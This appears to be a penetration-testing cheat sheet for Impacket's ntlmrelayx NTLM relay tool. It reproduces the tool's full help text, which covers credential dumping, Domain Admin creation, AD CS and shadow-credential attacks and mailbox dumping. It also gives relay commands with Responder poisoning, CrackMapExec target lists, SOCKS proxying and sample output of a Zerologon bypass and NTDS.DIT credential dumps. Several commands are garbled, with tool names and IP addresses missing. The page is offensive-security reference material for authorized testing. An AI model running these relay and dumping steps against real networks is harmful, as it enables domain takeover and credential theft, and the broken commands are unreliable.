For every connection received, this module will try to relay that connection to specified target(s) system or the original client.
Install Impacket. [-h] [-ts] [-debug] [-t TARGET] [-tf TARGETSFILE] [-w] [-i] [-ip INTERFACE_IP] [--no-smb-server] [--no-http-server] [--no-wcf-server] [--no-raw-server] [--smb-port SMB_PORT] [--http-port HTTP_PORT]
[--wcf-port WCF_PORT] [--raw-port RAW_PORT] [--no-multirelay] [--keep-relaying] [-ra] [-r SMBSERVER] [-l LOOTDIR] [-of OUTPUT_FILE] [-codec CODEC] [-smb2support] [-ntlmchallenge NTLMCHALLENGE] [-socks]
[-socks-address SOCKS_ADDRESS] [-socks-port SOCKS_PORT] [-http-api-port HTTP_API_PORT] [-wh WPAD_HOST] [-wa WPAD_AUTH_NUM] [-6] [--remove-mic] [--serve-image SERVE_IMAGE] [-c COMMAND] [-e FILE]
[--enum-local-admins] [-rpc-mode {TSCH}] [-rpc-use-smb] [-auth-smb [domain/]username[:password]] [-hashes-smb LMHASH:NTHASH] [-rpc-smb-port {139,445}] [-q QUERY] [-machine-account MACHINE_ACCOUNT]
[-machine-hashes LMHASH:NTHASH] [-domain DOMAIN] [-remove-target] [--no-dump] [--no-da] [--no-acl] [--no-validate-privs] [--escalate-user ESCALATE_USER] [--delegate-access] [--sid] [--dump-laps] [--dump-gmsa]
[--dump-adcs] [--add-dns-record NAME IPADDR] [--add-computer [COMPUTERNAME [PASSWORD ...]]] [-k KEYWORD] [-m MAILBOX] [-a] [-im IMAP_MAX] [--adcs] [--template TEMPLATE] [--altname ALTNAME] [--shadow-credentials]
[--shadow-target SHADOW_TARGET] [--pfx-password PFX_PASSWORD] [--export-type {PEM,PFX}] [--cert-outfile-path CERT_OUTFILE_PATH]
Impacket v0.12.0.dev1+20240718.115833.4e0e3174 - Copyright 2023 Fortra
Main options:
-h, --help show this help message and exit
-ts Adds timestamp to every logging output
-debug Turn DEBUG output ON
-t TARGET, --target TARGET
Target to relay the credentials to, can be an IP, hostname or URL like domain\username@host:port (domain\username and port are optional, and don't forget to escape the '\'). If unspecified, it will relay back
to the client')
-tf TARGETSFILE File that contains targets by hostname or full URL, one per line
-w Watch the target file for changes and update target list automatically (only valid with -tf)
-i, --interactive Launch an smbclient, LDAP console or SQL shell insteadof executing a command after a successful relay. This console will listen locally on a tcp port and can be reached with for example netcat.
-ip INTERFACE_IP, --interface-ip INTERFACE_IP
IP address of interface to bind SMB and HTTP servers
--smb-port SMB_PORT Port to listen on smb server
--http-port HTTP_PORT
Port(s) to listen on HTTP server. Can specify multiple ports by separating them with `,`, and ranges with `-`. Ex: `80,8000-8010`
--wcf-port WCF_PORT Port to listen on wcf server
--raw-port RAW_PORT Port to listen on raw server
--no-multirelay If set, disable multi-host relay (SMB and HTTP servers)
--keep-relaying If set, keeps relaying to a target even after a successful connection on it
-ra, --random Randomize target selection
-r SMBSERVER Redirect HTTP requests to a file:// path on SMBSERVER
-l LOOTDIR, --lootdir LOOTDIR
Loot directory in which gathered loot such as SAM dumps will be stored (default: current directory).
-of OUTPUT_FILE, --output-file OUTPUT_FILE
base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2
-codec CODEC Sets encoding used (codec) from the target's output (default "utf-8"). If errors are detected, run at the target, map the result with
and then execute again with -codec and the corresponding codec
-smb2support SMB2 Support
-ntlmchallenge NTLMCHALLENGE
Specifies the NTLM server challenge used by the SMB Server (16 hex bytes long. eg: 1122334455667788)
-socks Launch a SOCKS proxy for the connection relayed
-socks-address SOCKS_ADDRESS
SOCKS5 server address (also used for HTTP API)
-socks-port SOCKS_PORT
SOCKS5 server port
-http-api-port HTTP_API_PORT
-wh WPAD_HOST, --wpad-host WPAD_HOST
Enable serving a WPAD file for Proxy Authentication attack, setting the proxy host to the one supplied.
-wa WPAD_AUTH_NUM, --wpad-auth-num WPAD_AUTH_NUM
Prompt for authentication N times for clients without MS16-077 installed before serving a WPAD file. (default=1)
-6, --ipv6 Listen on both IPv6 and IPv4
--remove-mic Remove MIC (exploit CVE-2019-1040)
--serve-image SERVE_IMAGE
local path of the image that will we returned to clients
-c COMMAND Command to execute on target system (for SMB and RPC). If not specified for SMB, hashes will be dumped ( must be in the same directory). For RPC no output will be provided.
--no-smb-server Disables the SMB server
--no-http-server Disables the HTTP server
--no-wcf-server Disables the WCF server
--no-raw-server Disables the RAW server
SMB client options:
-e FILE File to execute on the target system. If not specified, hashes will be dumped ( must be in the same directory)
--enum-local-admins If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)
RPC client options:
-rpc-mode {TSCH} Protocol to attack, only TSCH supported
-rpc-use-smb Relay DCE/RPC to SMB pipes
-auth-smb [domain/]username[:password]
Use this credential to authenticate to SMB (low-privilege account)
-hashes-smb LMHASH:NTHASH
-rpc-smb-port {139,445}
Destination port to connect to SMB
MSSQL client options:
-q QUERY, --query QUERY
MSSQL query to execute(can specify multiple)
HTTP options:
-machine-account MACHINE_ACCOUNT
Domain machine account to use when interacting with the domain to grab a session key for signing, format is domain/machine_name
-machine-hashes LMHASH:NTHASH
Domain machine hashes, format is LMHASH:NTHASH
-domain DOMAIN Domain FQDN or IP to connect using NETLOGON
-remove-target Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)
LDAP client options:
--no-dump Do not attempt to dump LDAP information
--no-da Do not attempt to add a Domain Admin
--no-acl Disable ACL attacks
--no-validate-privs Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks
--escalate-user ESCALATE_USER
Escalate privileges of this user instead of creating a new one
--delegate-access Delegate access on relayed computer account to the specified account
--sid Use a SID to delegate access rather than an account name
--dump-laps Attempt to dump any LAPS passwords readable by the user
--dump-gmsa Attempt to dump any gMSA passwords readable by the user
--dump-adcs Attempt to dump ADCS enrollment services and certificate templates info
--add-dns-record NAME IPADDR
Add the <NAME> record to DNS via LDAP pointing to <IPADDR>
Common options for SMB and LDAP:
--add-computer [COMPUTERNAME [PASSWORD ...]]
Attempt to add a new computer account via SMB or LDAP, depending on the specified target. This argument can be used either with the LDAP or the SMB service, as long as the target is a domain controller.
IMAP client options:
-k KEYWORD, --keyword KEYWORD
IMAP keyword to search for. If not specified, will search for mails containing "password"
-m MAILBOX, --mailbox MAILBOX
Mailbox name to dump. Default: INBOX
-a, --all Instead of searching for keywords, dump all emails
-im IMAP_MAX, --imap-max IMAP_MAX
Max number of emails to dump (0 = unlimited, default: no limit)
AD CS attack options:
--adcs Enable AD CS relay attack
--template TEMPLATE AD CS template. Defaults to Machine or User whether relayed account name ends with `$`. Relaying a DC should require specifying `DomainController`
--altname ALTNAME Subject Alternative Name to use when performing ESC1 or ESC6 attacks.
Shadow Credentials attack options:
--shadow-credentials Enable Shadow Credentials relay attack (msDS-KeyCredentialLink manipulation for PKINIT pre-authentication)
--shadow-target SHADOW_TARGET
target account (user or computer$) to populate msDS-KeyCredentialLink from
--pfx-password PFX_PASSWORD
password for the PFX stored self-signed certificate (will be random if not set, not needed when exporting to PEM)
--export-type {PEM,PFX}
choose to export cert+private key in PEM or PFX (i.e. #PKCS12) (default: PFX))
--cert-outfile-path CERT_OUTFILE_PATH
filename to store the generated self-signed PEM or PFX certificate and key
For every connection received, this module will try to relay that connection to specified target(s) system or (by default) the original client
Start and turn off HTTP and SMB server. Also start PCredz in listening mode (sudo python3 Pcredz -i eth0
$ sudo python3 -I enp0s31f6
[+] Poisoners:
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [OFF]
By default relays to the client who sends the hash, dumping SAM. It’s recommended to use -socks
so if authentication was succesful a socks connection is set up. This way you can use tooling thru for example ProxyChains.
$ sudo -smb2support -socks -of captured-hashes
Impacket v0.9.22.dev1+20200924.183326.65cf657f - Copyright 2020 SecureAuth Corporation
[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Connection from offsec/ADMINISTRATOR@ controlled, attacking target smb://
[*] Connecting to NETLOGON service
[*] SMB Auth OK, successfully
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Start with the target system in place.
$ sudo -t -smb2support -socks
Impacket v0.9.22.dev1+20200924.183326.65cf657f - Copyright 2020 SecureAuth Corporation
[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Connection from offsec/ADMINISTRATOR@ controlled, attacking target dcsync://
[*] Connecting to NETLOGON service
[*] Netlogon Auth OK, successfully bypassed autentication using Zerologon after 1 attempts!
[*] offsec\Administrator successfully validated through NETLOGON
[*] NTLM Sign/seal key: cf65d6660ec15d940f687bde79572094[...]
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
To use with a list of targets you want to relay to, first generate a list with CrackMapExec by using the command below.
crackmapexec smb --gen-relay-list targetlist
Then you can use the -tf
flag with to use the targetlist created as input file.
As described it is recommended to use -socks
so if authentication was successful a socks connection is set up. This way you can use tooling thru for example ProxyChains.
ntlmrelayx> socks
Protocol Target Username AdminStatus Port
-------- ------ -------- ----------- ----